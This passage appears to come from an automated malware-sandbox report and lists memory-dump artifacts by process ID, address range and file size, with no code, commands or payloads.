                    • memory/3532-231-0x0000000000000000-mapping.dmp

                    • memory/3644-225-0x0000000000000000-mapping.dmp

                    • memory/3748-216-0x0000000000000000-mapping.dmp

                    • memory/3748-220-0x00007FF7F2860000-0x00007FF7F30D8000-memory.dmp

                      Filesize

                      8.5MB

                    • memory/3752-184-0x0000000005790000-0x0000000005791000-memory.dmp

                      Filesize

                      4KB

                    • memory/3752-170-0x0000000000000000-mapping.dmp

                    • memory/3752-185-0x00000000057E0000-0x00000000057E1000-memory.dmp

                      Filesize

                      4KB

                    • memory/3752-174-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

                      Filesize

                      4KB

                    • memory/3752-179-0x0000000077E30000-0x0000000077FBE000-memory.dmp

                      Filesize

                      1.6MB

                    • memory/3788-247-0x000000000096259C-mapping.dmp

                    • memory/3788-243-0x00000000008D0000-0x00000000009C1000-memory.dmp

                      Filesize

                      964KB

                    • memory/3788-248-0x00000000008D0000-0x00000000009C1000-memory.dmp

                      Filesize

                      964KB

                    • memory/3880-229-0x0000000000000000-mapping.dmp

                    • memory/4012-190-0x0000000000000000-mapping.dmp

                    • memory/4056-150-0x0000000004CB0000-0x00000000052B6000-memory.dmp

                      Filesize

                      6.0MB

                    • memory/4056-147-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                      Filesize

                      4KB

                    • memory/4056-155-0x0000000006980000-0x0000000006981000-memory.dmp

                      Filesize

                      4KB

                    • memory/4056-134-0x0000000000400000-0x0000000000422000-memory.dmp

                      Filesize

                      136KB

                    • memory/4056-135-0x000000000041C5F6-mapping.dmp